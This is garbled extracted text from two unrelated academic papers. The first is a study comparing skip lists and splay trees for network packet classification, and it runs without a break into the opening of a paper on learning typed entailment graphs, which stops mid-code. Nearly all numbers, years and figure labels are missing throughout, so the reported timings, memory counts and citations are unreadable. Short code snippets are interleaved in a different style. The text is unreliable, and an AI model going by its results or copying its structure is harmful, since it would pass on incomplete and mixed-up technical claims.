using a set of hash tables and a splay tree, packet filtering was done according to the destination address. their research paid particular attention to packets driven by the default path because it covered a major part of routers’ traffic. their design was better than previous models, especially for very diverse inputs, and had a logarithmic time cost for doing its tasks. in , kirschenhofer, martínez & prodinger ( ) decided to mark the elements whose keys had been compared in the search algorithm in order to avoid unnecessary comparisons of the keys during the search in the skip list. their evaluation criterion in this study was a detailed analysis of the total search cost (expectation and variance) so that the search cost would be calculated based on key-to-key comparisons and the results would be compared with standard search results. their comparison shows that the cost of their method is much less than the standard search cost. algorithms and tools this section describes how the algorithms in question operate. consider the sample rules in table . this set of rules is arranged in descending order based on the fixed length of the source addresses, and if the source addresses are equal, the sorting operations are performed according to the destination addresses. thus, the address placed at the top of the table has a higher priority than other addresses. the set of the source and destination prefix addresses of the rules must be converted into a range of integers (trabelsi & zeidan, ). for this purpose, the upper and lower boundaries are first calculated for each prefix in the set of source addresses, as shown in table . for the sake of simplicity, the prefix addresses are displayed in a six-bit format. splay tree for each field including the source address, destination address, source port number, destination port number, and protocol type, a splay tree should be created (trabelsi & zeidan, ; trabelsi & zeidan, ; trabelsi et al., ). in addition to pointers to the left and right children as well as the parent node, each node of the tree contains a value and a counter to hold the number of times the node is matched with the input packets and a list for storing the rules. initially, the counter of all nodes is set to zero. in the protocol tree, each node contains a list of rules whose protocol field has a value is equal to the value of the node, but in other trees each node contains a list of rules in which the lower boundary is less than or equal to the value of the node and the upper boundary is greater than or equal to the value of the node. as the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding trees in two steps (trabelsi & zeidan, ; trabelsi et al., ). in the first step, the lower boundary is inserted into the tree. if the lower boundary is less than the root value, it is inserted under the left tree, and if it is greater than the root value, it will be inserted under the right tree. then the value of the lower boundary node khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table an example of a set of rules. each row of the table is a rule of a rule set. each rule is represented as constraints on source ip, destination ip, source port number, destination port nummber and protocol. 
rule source ip address destination ip address source port number destination port number protocol r * * , , r * * , , r * * , , r * * , , r * * , , table an example of converting source prefix addresses to a numerical range. each prefix at the sec- ond column of the table is converted to corresponding upper and lower boundaries which are presented at the third and fourth columns. the fifth and sixth columns corresponds to decimal representation of the start and end points of the boundary. rule source prefix addresses lower boundary upper boundary start end r * r * r * r * r * is compared with the upper and lower boundary values of all the rules. when the lower boundary value lies within the range of a rule, the id of that rule is added to the list of lower boundary rules. after being added to the tree, the lower boundary node will be moved to the root of the tree using the rotation operation. the second step is to insert the upper boundary into the tree. this step resembles the insertion of the lower boundary. figure shows the steps for creating a splay tree for the source address fields of the rules in table . in fig. a, the r rule has been added to the tree. to this end, first the lower boundary value is inserted. since the value of lies within the range of r and r , the id of these rules is added to the rules list. then, the value of is inserted and the ids of r and r rules are added to its rules list. finally, is transferred to the root of the tree with a left rotation. in fig. b, the r rule has been added to the tree. in this case, the value of is inserted. first the node is searched in the tree and, if it is not found, it will be inserted in the correct place and the ids of r , r , and r are added to the its rules list. finally, the node is transferred to the root through a right rotation between and and a right rotation between and . in fig. c, the value of , which is the lower boundary of r , is inserted. in the next step, the r , r , and r rules are added to its list of rules. then the node is transferred to the root with through a right rotation between the nodes and and a left rotation between and . finally, the r rule is added to the tree. since its values have already been added, no change occurs in the tree. skip list to build skip lists (pan et al., ), the set of rules is first transmitted to the program and the upper and lower boundaries of the rules are calculated. for each of the fields of khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the steps of creating a splay tree. (a) inserting the r rule; (b) inserting the lower boundary of the r rule; (c) inserting the upper boundary of the r rule. full-size doi: . /peerjcs. /fig- source address, destination address, source port number, destination port number, and protocol type, a skip list must be created. each skip list contains a value, a list for storing rules, and a list for storing pointers to subsequent nodes based on the level of each node. to determine the level of each node, a random function is used which creates an integer in a specified range (between and in our implementation). 
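the level generator mentioned above is the only randomized part of building a skip list. a minimal c++ sketch is given below; MAX_LEVEL is a placeholder, since the exact range used by the authors is not preserved in this text, and pugh's original skip list (pugh, ) instead draws levels from a geometric (coin-flipping) distribution.

#include <random>

// draws the level of a new skip-list node uniformly from [0, MAX_LEVEL];
// MAX_LEVEL stands in for the fixed range mentioned in the paper.
constexpr int MAX_LEVEL = 4;

int randomLevel(std::mt19937 &rng) {
    std::uniform_int_distribution<int> dist(0, MAX_LEVEL);
    return dist(rng);
}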
in the protocol skip list, each node contains a list of rules whose protocol field has a value equal to the value of the node, but in other skip lists each node contains a list of rules in which the lower boundary of the corresponding field is less than or equal to the value of the node and the upper boundary of the corresponding field is greater than or equal to the value of the node. as the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding skip lists in two steps. in the first step, the lower boundary is inserted into the skip list. then the value of the lower boundary node is compared with the upper and lower boundary values of all the rules. when the lower boundary value lies within the range of a rule, the id of that rule is added to the list of lower boundary rules. then, based on the node's level, a list of pointers is built for the created node. in the second step, we add the upper boundary. this step resembles the insertion of the lower boundary. figure shows the steps for creating a skip list for the source address field in table . in fig. a, the r rule has been added to the skip list. first, the lower boundary of at the level is inserted into the skip list. since the value of lies within the range of r and r , the id of these rules is added to the rules list. then the upper boundary of at the level is inserted and the ids of r and r rules are added to its rules list. in fig. b, the r rule has been added to the skip list. the value of at the level is inserted and the ids of r , r , and r are added to its rules list. next, the value of at the level is inserted and the ids of r , r , and r are added to its rules list. in fig. c, the r rule is added to the skip list. the values of this rule are repetitive. packet classification with both skip lists and splay trees, packet classification proceeds as follows. when a packet is received, the information in its header, including source and destination addresses, source and destination port numbers, and protocol type, is extracted. next, for each of the mentioned
these rotations can be particularly harmful when nodes are augmented with auxiliary structures. this situation is present in packet classification. simple operations like move-to-root could partially solve this problem and improve the performance of the splay trees when there is locality of references in the operation sequence. but, it is not ideal in the case of packet classification where the sequence of the burst operations has no predictable locality (sahni & kim, ). on the contrary, the simplicity of skip list algorithms makes them easier to implement and provides significant constant factor speed improvements over balanced tree and self- adjusting tree algorithms like splay trees (dean & jones, ). their scheme is designed to give good expected performance for busty access patterns (sahni & kim, ). skip lists are also very space efficient (sen, ; kirschenhofer, martínez & prodinger, ). to practically investigate the above predictions about the performance of these two competitor algorithms, we implement and experiment them on several data sets. implementation and evaluation splay tree and skip list approaches were implemented in c++ and executed ten times on a system with intel core i . ghz and gb of ram. the performance criteria were calculated using average results. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the two approaches were evaluated based on the number of memory accesses for packet classification, classification time, and memory usage. the class bench tool (taylor & turner, ) was used to generate rule sets and packet headers. the acl and ipc rules were created in the evaluations to compare the number of memory accesses for packet classification as well as the times of packet classification with , k, and k rules. for our evaluations, we generated a set of k, k, and k packet headers corresponding to each of the set of rules. we also used ipc and acl rules to determine the amount of memory usage. first, we look at packet classification time which is the time span from when a packet enters the structure of a classifier until the system can find the matching rule for that packet. the shorter the packet classification time, the more efficient the structure of the classifier will be. figure shows the time for classifying a wide variety of packets based on the sets of , k, and k acl and ipc rules for the skip list and splay tree. figure a compares these two approaches for k packets. in these charts, the smallest difference between the two approaches is observed for rules and the largest difference for k rules. the skip list classifies packets for ipc and acl rules in and , ms, respectively, and the splay tree does this in , and , ms, respectively. also, the packet classification time of the skip list for k ipc and acl rules is and , ms, respectively, while this time for the splay tree is and , ms, respectively. it can be concluded that, with an increased number of rules, the difference in classification time between the performances of the two approaches becomes greater. in fact, the skip list performs this task more optimally than the splay tree. also, the type of rules plays an important role in packet classification time so that packets are classified in a significantly shorter time when matched with ipc rules. a decreased number of rules would reduce the time difference while increased number of rules would increase this difference. 
consequently, the choice of the type of rules for packet classification might affect performance. figure b evaluates both the skip list and splay tree for k packets. as mentioned in fig. a, the least difference in packet classification time between acl and ipc rules is observed for rules where as the largest difference is observed for k rules. the skip list classifies packets for ipc and acl rules in , and , ms, respectively, and the splay tree does this in , and , ms, respectively. also, the packet classification time of the skip list for k ipc and acl rules is , and , ms, respectively, while this time for the splay tree is , and , ms, respectively. as a result, with the increase in the number of packets, the skip list still outperforms splay tree in terms of packet classification time. however, increased number of packets has difference in packet classification time of the two approaches for acl rules smaller than that for ipc rules. this means that, if the number of rules is small enough, an increased number of packets could be best handled by acl rules; otherwise, ipc rules should be used for larger numbers of rules. the difference is particularly significant in classification with k rules. in fig. c, the results of the classification of k packages are evaluated. in this evaluation, too, the skip list has a better performance than the splay tree. for the set of ipc rules, the smallest difference between the two approaches can be observed for k rules. in this case, the skip list classifies packets in , ms and the splay tree does this in , ms. as in the previous part, the khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure packet classification time for the sets of , k, and k acl and ipc rules for different num- bers of packets. (a) k, (b) k, and (c) k packets. full-size doi: . /peerjcs. /fig- khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. smallest difference between these two approaches is observed for the set of acl rules so that the packet classification time of the skip list is , ms whereas that of the splay tree is , ms. the difference in packet classification time between skip list and splay tree with both ipc and acl rules is significant. this result can be used to select appropriate rules for designing a system that is to be efficient in terms of packet classification. here again, the greatest difference between the two approaches is manifested in the case of k rules. with k ipc and acl rules, the skip list classifies packets in , and , ms, respective, while splay tree does this task in , and , ms, respectively. as can be seen, this time difference for the ipc rules is much smaller than for the acl rules. in general, fig. shows that skip list approach classifies packets in a shorter time. in addition, the increase in the packet classification time of the skip list due to increased number of rules is significantly less than that of the splay tree. it can be inferred that skip list has a better performance than the splay tree in the classification of packets. one of the most important criteria for the performance of classification approaches is the speed of search. in the architecture of network processors, memory access is the most important reason for prolonged execution of commands on packets. frequent access to memory reduces system performance. 
reduced memory access would decrease packet classification time and, thus, accelerate the process. therefore, decreased memory access is central to the efficiency of an approach. figure a evaluates the two approaches for k packets. as can be seen, in all cases skip list has fewer memory accesses than splay tree. also, the minimum number of memory access is , , which belongs to skip list with ipc rules. splay tree has , memory accesses with k acl rules, which is the highest number of access in our evaluation. with the increase in the number of rules, the difference in memory access between the two approaches increases significantly. with k ipc and acl rules, the skip list has , and , memory accesses, respectively, while the splay tree accesses memory , and , times, respectively. the greatest difference in the number of memory accesses between the skip list and splay tree is observed in the case of k acl rules in which splay tree accesses memory , times more than skip list. figure b compares skip list and splay tree for k packets. as in previous parts, the skip list outperforms the splay tree in terms of memory access. in general, the minimum number of memory access is , which belongs to the skip list with ipc rules. the maximum number is which belongs to the splay tree with k acl rules. the greatest difference in the number of memory accesses between the skip list and the splay tree is observed in the case of k acl rules in which the splay tree accesses memory times more than the skip list. it can be observed in the chart that the number of memory accesses for both approaches using ipc rules is much smaller than using acl rules, which could be a reason for preferring ipc rules in the design of such systems. figure c compares the skip list and the splay tree with k packets. the chart shows that, with increase in the number of packets with different numbers of rules, the skip list has less memory access than does the splay tree. in this chart, the smallest number of memory access is which belongs to the skip list with ipc rules and the largest number of access is which belongs to the splay tree with k acl rules. the greatest difference between the two approaches is observed in khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the number of memory accesses for packet classification with sets of , , , and , acl and ipc rules for different number of packets. (a) k, (b) k, and (c) k packets. full-size doi: . /peerjcs. /fig- the case of k acl rules, with the splay tree having accessed memory times more than the skip list. as can be seen in fig. , the skip list has a better performance than the splay tree in terms of memory access. also, with increasing number of rules, the increase in the number of memory accesses for the skip list is much smaller than that of the splay khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure memory usage for k acl and ipc rules. the red and blue bars represent the memory usage of the splay tree and skip list algorithms respectively. full-size doi: . /peerjcs. /fig- tree. as a result, the performance of the skip list can be considered as more efficient than the splay tree. according to the results of the charts in figs. and , another important point is correspondence in the results of memory access time and number which exactly confirm each other in all cases. 
given the memory limitations in the majority of systems and the high costs of upgrading memories, another performance criterion for classification approaches is the amount of memory usage. as a result, every approach should aim at reducing memory usage. figure shows the amount of memory used in bytes by skip list and splay tree for classifying packets with k acl and ipc rules. as can be seen, the amount of memory used by skip list is , bytes with ipc rules and , bytes for acl rules whereas the memory usage of splay tree is , bytes for ipc rules and , bytes for acl rules. the amount of memory used by skip list with both sets of rules is slightly more than splay tree. this additional amount of space is used to hold pointers in a skip list. also, the amount of memory used by both approaches with ipc rules is significantly less than the memory used with acl rules. however, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. conclusion packet classification is among the basic processes in network processors. the most important issue is the use of a packet classification approach that can keep up with the network speed. such an approach should also optimize memory consumption. the existing methods have not been able to balance the time and memory consumption. on the other hand, binary trees work well when the elements enter accidentally, but they become inefficient in cases where the operations are sequential. in this study, therefore, we focused on the skip list and the splay tree and evaluated these two approaches with acl and ipc rules. our results suggest that skip list performs better in terms of package khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. classification time and the number of memory accesses. also, with increase in the number of rules, packet classification time and memory access increase less in a skip list than in a splay tree. the amount of memory used by the skip list is slightly more than the splay tree, which is due to storing the pointers in skip lists. however, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. accordingly, the skip list can be considered as superior to the splay tree. obviously, the data and control dependencies in the algorithms will change their performance in parallel processing. therefore, the authors aim to study the parallelization of both algorithms on graphics processors and evaluate the performance of their parallel versions in further research. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • navid khezrian performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • mahdi abbasi conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, submission of the paper. data availability the following information was supplied regarding data availability: the raw measurements are available in supplemental files. 
supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references baboescu f, varghese g. . scalable packet classification. acm sigcomm computer communication review ( ): – doi . / . . bi x-a, luo x, sun q. . branch tire packet classification algorithm based on single-linkage clustering. mathematics and computers in simulation : – doi . /j.matcom. . . . bontupalli v, yakopcic c, hasan r, taha tm. . efficient memristor-based archi- tecture for intrusion detection and high-speed packet classification. acm journal on emerging technologies in computing systems ( ): . khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /j.matcom. . . http://dx.doi.org/ . /peerj-cs. comer de. . network systems design with network processors, agere version. upper saddle river: prentice hall. dean bc, jones zh. . exploring the duality between skip lists and binary search trees. in: proceedings of the th annual southeast regional conference. new york: acm, – . gao l, tan m-f, gong z-h. . survey and evaluation of ip packet classification algorithms. computer engineering & science ( ): – . harada t, tanaka k, mikawa k. . acceleration of packet classification via inclusive rules. in: ieee conference on communications and network security (cns). piscataway: ieee. inoue t, mano t, mizutani k, minato s-i, akashi o. . fast packet classification algorithm for network-wide forwarding behaviors. computer communications : – doi . /j.comcom. . . . kaufmann m. . network routing algorithms, protocols, and architectures. burlington: morgan kaufmann. kirschenhofer p, martínez c, prodinger hjtcs. . analysis of an optimized search algorithm for skip lists. theoretical computer science ( – ): – . li w, li x, li h, xie g. . cutsplit: a decision-tree combining cutting and splitting for scalable packet classification. in: ieee infocom —ieee conference on computer communications. piscataway: ieee. li y, zhang d, liu ax, zheng j. . gamt: a fast and scalable ip lookup engine for gpu-based software routers. in: proceedings of the ninth acm/ieee symposium on architectures for networking and communications systems. piscataway: ieee press. lim h. . survey and proposal on packet classification algorithms. in: interna- tional conference on high performance switching and routing. piscataway: ieee. lin f, wang g, zhou j, zhang s, yao x. . high-performance ipv address lookup in gpu-accelerated software routers. journal of network and computer applications : – doi . /j.jnca. . . . nagpal b, singh n, chauhan n, murari r. . a survey and taxonomy of various packet classification algorithms. in: international conference on advances in computer engineering and applications. piscataway: ieee. neji nb, bouhoula a. . self-adjusting scheme for high speed routers. in: rd ieee conference on local computer networks (lcn). piscataway: ieee. pan t, huang t, liu j, zhang j, yang f, li s, liu y. . fast content store lookup using locality-aware skip list in content-centric networks. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee. papadakis t. . skip lists and probabilistic analysis of algorithms. phd dissertation, university of waterloo. perez kg, yang x, scott-hayward s, sezer s. . 
optimized packet classification for software-defined networking. in: ieee international conference on communications (icc). piscataway: ieee. pugh w. . skip lists: a probabilistic alternative to balanced trees. communications of the acm ( ): – . khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.comcom. . . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. qi y, xu l, yang b, xue y, li j. . packet classification algorithms: from theory to practice. in: ieee infocom . piscataway: ieee. sahni s, kim ks. . data structures for ip lookup with bursty access patterns. available at https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf. sen sjipl. . some observations on skip-lists. information processing letters ( ): – doi . / - ( ) -h. sleator dd, tarjan re. . self-adjusting binary search trees. journal of the acm ( ): – doi . / . . srinivasan v, suri s, varghese g. . packet classification using tuple space search. acm sigcomm computer communication review ( ): – doi . / . . taylor de. . survey and taxonomy of packet classification techniques. acm computing surveys (csur) ( ): – doi . / . . taylor de, turner jsjiaton. . classbench: a packet classification benchmark. ieee/acm transactions on networking ( ): – . tessier r, wolf t, hu k, chandrikakutty h. . reconfigurable network router secu- rity. in: gaillardon p-e, ed. reconfigurable logic: architecture, tools, and applications. boca raton: crc press. trabelsi z, masud mm, ghoudi kjc, security. . statistical dynamic splay tree filters towards multilevel firewall packet filtering enhancement. computers & security : – doi . /j.cose. . . . trabelsi z, zeidan s. . splay trees based early packet rejection mechanism against dos traffic targeting firewall default security rule. in: ieee international workshop on information forensics and security. piscataway: ieee. trabelsi z, zeidan s. . multilevel early packet filtering technique based on traffic statistics and splay trees for firewall performance improvement. in: ieee international conference on communications (icc). piscataway: ieee. zeidan s, trabelsi z. . a survey on firewall’s early packet rejection techniques. in: international conference on innovations in information technology. piscataway: ieee. zhong t, geng j, zhao k. . an efficient authenticated data structure for dynamic data set based on b+ tree. in: international conference on communications, circuits and systems (icccas). piscataway: ieee. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.cise.ufl.edu/~sahni/papers/burstyc.pdf http://dx.doi.org/ . / - ( ) -h http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /peerj-cs. edinburgh research explorer learning typed entailment graphs with global soft constraints citation for published version: hosseini, smj, chambers, n, reddy, s, holt, xr, cohen, s, johnson, m & steedman, m , 'learning typed entailment graphs with global soft constraints', transactions of the association for computational linguistics, vol. , pp. - . https://doi.org/ . /tacl_a_ digital object identifier (doi): . 
/tacl_a_ link: link to publication record in edinburgh research explorer document version: peer reviewed version published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://doi.org/ . /tacl_a_ https://doi.org/ . /tacl_a_ https://www.research.ed.ac.uk/portal/en/publications/learning-typed-entailment-graphs-with-global-soft-constraints(f e cde - adb- f -aeab- ff ).html learning typed entailment graphs with global soft constraints mohammad javad hosseini?§ nathanael chambers?? siva reddy† xavier r. holt‡ shay b. cohen? mark johnson‡ and mark steedman? ?university of edinburgh §the alan turing institute, uk ??united states naval academy †stanford university ‡macquarie university javad.hosseini@ed.ac.uk, nchamber@usna.edu, sivar@stanford.edu {xavier.ricketts-holt,mark.johnson}@mq.edu.au {scohen,steedman}@inf.ed.ac.uk abstract this paper presents a new method for learn- ing typed entailment graphs from text. we extract predicate-argument structures from multiple-source news corpora, and compute local distributional similarity scores to learn entailments between predicates with typed arguments (e.g., person contracted disease). previous work has used transitivity con- straints to improve local decisions, but these constraints are intractable on large graphs. we instead propose a scalable method that learns globally consistent similarity scores based on new soft constraints that consider both the structures across typed entailment graphs and inside each graph. learning takes only a few hours to run over k predicates and our results show large im- provements over local similarity scores on two entailment datasets. we further show improvements over paraphrases and entail- ments from the paraphrase database, and prior state-of-the-art entailment graphs. we show that the entailment graphs improve performance in a downstream task. introduction recognizing textual entailment and paraphrasing is critical to many core natural language process- ing applications such as question-answering and semantic parsing. the surface form of a sentence that answers a question such as “does verizon own yahoo?” frequently does not directly cor- respond to the form of the question, but is rather a paraphrase or an expression such as “verizon bought yahoo”, that entails the answer. the lack of a well-established form-independent semantic representation for natural language is the most im- portant single obstacle to bridging the gap between queries and text resources. this paper seeks to learn meaning postulates (e.g., buying entails owning) that can be used to t =person,t =location visit arrive in leave leave for t =company,t =company own 's acquisition of buy figure : examples of typed entailment graphs for arguments of types company,company and per- son,location. augment the standard form-dependent semantics. 
our immediate goal is to learn entailment rules be- tween typed predicates with two arguments, where the type of each predicate is determined by the types of its arguments. we construct typed entail- ment graphs, with typed predicates as nodes and entailment rules as edges. figure shows simple examples of such graphs with arguments of types company,company and person,location. entailment relations are detected by computing a similarity score between the typed predicates based on the distributional inclusion hypothesis, which states that a word (predicate) u entails an- other word (predicate) v if in any context that u can be used so can be v (dagan et al., ; gef- fet and dagan, ; herbelot and ganesalingam, ; kartsaklis and sadrzadeh, ). most pre- vious work has taken a “local learning” approach (lin, ; weeds and weir, ; szpektor and dagan, ; schoenmackers et al., ), i.e., learning entailment rules independently from each other. one problem facing local learning approaches is that many correct edges are not identified be- cause of data sparsity and many wrong edges are spuriously identified as valid entailments. a “global learning” approach, where dependencies between entailment rules are taken into account, can improve the local decisions significantly. be- rant et al. ( ) imposed transitivity constraints on the entailments, such that the inclusion of rules i→j and j→k implies that of i→k. while they showed transitivity constraints to be effective in learning entailment graphs, the integer linear pro- gramming (ilp) solution of berant et al. ( ) is not scalable beyond a few hundred nodes. in fact, the problem of finding a maximally weighted transitive subgraph of a graph with arbitrary edge weights is np-hard (berant et al., ). this paper instead proposes a scalable solution that does not rely on transitivity closure, but in- stead uses two global soft constraints that main- tain structural similarity both across and within each typed entailment graph (figure ). we intro- duce an unsupervised framework to learn globally consistent similarity scores given local similarity scores (§ ). our method is highly parallelizable and takes only a few hours to apply to more than k predicates. , our experiments (§ ) show that the global scores improve significantly over local scores and outperform state-of-the-art entailment graphs on two standard entailment rule datasets (berant et al., ; holt, ). we ultimately intend the typed entailment graphs to provide a resource for entailment and paraphrase rules for use in seman- tic parsing and open domain question-answering, as has been done for similar resources such as the paraphrase database (ppdb; ganitkevitch et al., ; pavlick et al., ) in wang et al. ( ); dong et al. ( ). with that end in view, we have included a comparison with ppdb in our evaluation on the entailment datasets. we also show that the learned entailment rules improve performance on a question-answering task (§ ) with no tuning or prior knowledge of the task. related work our work is closely related to berant et al. ( ), where entailment graphs are learned by imposing transitivity constraints on the entailment relations. however, the exact solution to the problem is not scalable beyond a few hundred predicates, while the number of predicates that we capture is two orders of magnitude larger (§ ). hence, it is nec- essary to resort to approximate methods based on we performed our experiments on a -core . ghz machine with gb of ram. 
our code, extracted binary relations and the learned entailment graphs are available at https://github.com/mjhosseini/entgraph. predicates inside each clique in the entailment graphs are considered to be paraphrases. assumptions concerning the graph structure. be- rant et al. ( ) and berant et al. ( ) propose tree-node-fix (tnf), an approximation method that scales better by additionally assuming the en- tailment graphs are “forest reducible", where a predicate cannot entail two (or more) predicates j and k such that neither j→k nor k→j (frg as- sumption). however, the frg assumption is not correct for many real-world domains. for exam- ple, a person visiting a place entails both arriving at that place and leaving that place, while the lat- ter do not necessarily entail each other. our work injects two other types of prior knowledge about the structure of the graph that are less expensive to incorporate and yield better results on entailment rule datasets. abend et al. ( ) learn entailment relations over multi-word predicates with different levels of compositionality. pavlick et al. ( ) add variety of relations, including entailment, to phrase pairs in ppdb. this includes a broader range of entail- ment relations such as lexical entailment. in con- trast to our method, these works rely on supervised data and take a local learning approach. another related strand of research is link pre- diction (socher et al., ; bordes et al., ; riedel et al., ; yang et al., ; trouil- lon et al., ; dettmers et al., ), where the source data are extractions from text, facts in knowledge bases, or both. unlike our work, which directly learns entailment relations between pred- icates, these methods aim at predicting the source data, i.e., whether two entities have a particular relationship. the common wisdom is that en- tailment relations are by-product of these meth- ods (riedel et al., ). however, this assump- tion has not usually been explicitly evaluated. explicit entailment rules provide explainable re- sources that can be used in downstream tasks. our experiments show that our method signifi- cantly outperforms a state-of-the-art link predic- tion method. computing local similarity scores we first extract binary relations as predicate- argument pairs using a combinatory categorial grammar (ccg; steedman, ) semantic parser (§ . ). we map the arguments to their wikipedia urls using a named entity linker (§ . ). we ex- tract types such as person and disease for each ar- gument (§ . ). we then compute local similarity scores between predicate pairs (§ . ). . relation extraction the semantic parser of reddy et al. ( ), graphparser, is run on the newsspike corpus (zhang and weld, ) to extract binary re- lations between a predicate and its arguments from sentences. graphparser uses ccg syn- tactic derivations and λ-calculus to convert sen- tences to neo-davisonian semantics, a first-order logic that uses event identifiers (parsons, ). for example, for the sentence, obama visited hawaii in , graphparser produces the logi- cal form ∃e.visit (e, obama)∧visit (e, hawaii)∧ visitin(e, ), where e denotes an event. we will consider a relation for each pair of ar- guments, hence, there will be three rela- tions for the above sentence: visit , with ar- guments (obama,hawaii), visit ,in with argu- ments (obama, ) and visit ,in with arguments (hawaii, ). we currently only use extracted relations that involve two named entities or one named entity and a noun. 
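the conversion from an n-ary neo-davidsonian event to binary relations, as in the obama-visited-hawaii example above, can be sketched as follows; the event representation and the exact relation-name format here are a simplified stand-in for graphparser's actual output.

```python
from itertools import combinations

# hypothetical representation of the neo-davidsonian parse of
# "obama visited hawaii in <year>": an event with labelled argument slots.
event = {"pred": "visit", "args": {"1": "obama", "2": "hawaii", "in": "<year>"}}

def binary_relations(event):
    """turn an n-ary event into one binary relation per argument pair,
    mirroring the visit.1,2 / visit.1,in / visit.2,in naming in the text."""
    rels = []
    for (r1, a1), (r2, a2) in combinations(sorted(event["args"].items()), 2):
        rels.append((f"{event['pred']}.{r1},{r2}", a1, a2))
    return rels

for rel in binary_relations(event):
    print(rel)
# ('visit.1,2', 'obama', 'hawaii')
# ('visit.1,in', 'obama', '<year>')
# ('visit.2,in', 'hawaii', '<year>')
```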
we constrain the rela- tions to have at least one named entity to reduce ambiguity in finding entailments. we perform a few automatic post-processing steps on the output of the parser. first, we normal- ize the predicates by lemmatization of their head words. passive predicates are mapped to active ones and we extract negations and particle verb predicates. next, we discard unary relations and relations involving coordination of arguments. fi- nally, whenever we see a relation between a sub- ject and an object, and a relation between object and a third argument connected by a prepositional phrase, we add a new relation between the subject and the third argument by concatenating the rela- tion name with the object. for example, for the sentence china has a border with india, we ex- tract a relation have border ,with between china and india. we perform a similar process for pps attached to vps. most of the light verbs and multi- word predicates will be extracted by the above post-processing (e.g., take care ,of ) which will re- cover many salient ternary relations. while entailments and paraphrasing can bene- fit from n-ary relations, e.g., person visits a lo- cation in a time, we currently follow previous work (lewis and steedman, a; berant et al., ) in confining our attention to binary rela- tions, leaving the construction of n-ary graphs to future work. . linking and typing arguments entailment and paraphrasing depend on context. while using exact context is impractical in form- ing entailment graphs, many authors have used the type of the arguments to disambiguate polysemous predicates (berant et al., , ; lewis and steedman, a; lewis, ). typing also re- duces the size of the entailment graphs. since named entities can be referred to in many different ways, we use a named entity linking tool to normalize the named entities. in the ex- periments below, we use aidalight (nguyen et al., ), a fast and accurate named entity linker, to link named entities to their wikipedia urls (if any). we thus type all entities that can be grounded in wikipedia. we first map the wikipedia url of the entities to freebase (bol- lacker et al., ). we select the most notable type of the entity from freebase and map it to figer types (ling and weld, ) such as build- ing, disease, person and location, using only the first level of the figer type hierarchy. for exam- ple, instead of event/sports_event, we use event as type. if an entity cannot be grounded in wikipedia or its freebase type does not have a mapping to figer, we assign the default type thing to it. . local distributional similarities for each typed predicate (e.g., visit , with types person,location), we extract a feature vector. we use as feature types the set of argument pair strings (e.g., obama-hawaii) that instantiate the binary relations of the predicates. the value of each fea- ture is the pointwise mutual information (pmi) be- tween the predicate and the feature. we use the feature vectors to compute three local similarity scores (both symmetric and directional) between typed predicates: weeds (weeds and weir, ), lin (lin, ), and balanced inclusion (binc; szpektor and dagan, ) similarities. learning globally consistent entailment graphs we learn globally consistent similarity scores based on local similarity scores. the global scores will be used to form typed entailment graphs. types out of figer types . problem formulation let t be a set of types and p be a set of predicates. 
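before the global formulation continues, it may help to sketch the local scores just described in code. the pmi weighting and the lin and inclusion-style measures below follow the standard textbook definitions; the exact variants are those of the cited works (weeds and weir; lin; szpektor and dagan), so this is an approximation rather than the authors' implementation.

```python
import math

def pmi_vector(counts, pred, total, pred_totals, feat_totals):
    """positive pointwise mutual information between a predicate and each of
    its argument-pair features (keeping only positive values is a common
    choice; the paper does not spell this detail out)."""
    vec = {}
    for feat, c in counts[pred].items():
        pmi = math.log(c * total / (pred_totals[pred] * feat_totals[feat]))
        if pmi > 0:
            vec[feat] = pmi
    return vec

def lin(u, v):
    """lin-style similarity between two weighted feature vectors (symmetric)."""
    shared = set(u) & set(v)
    num = sum(u[f] + v[f] for f in shared)
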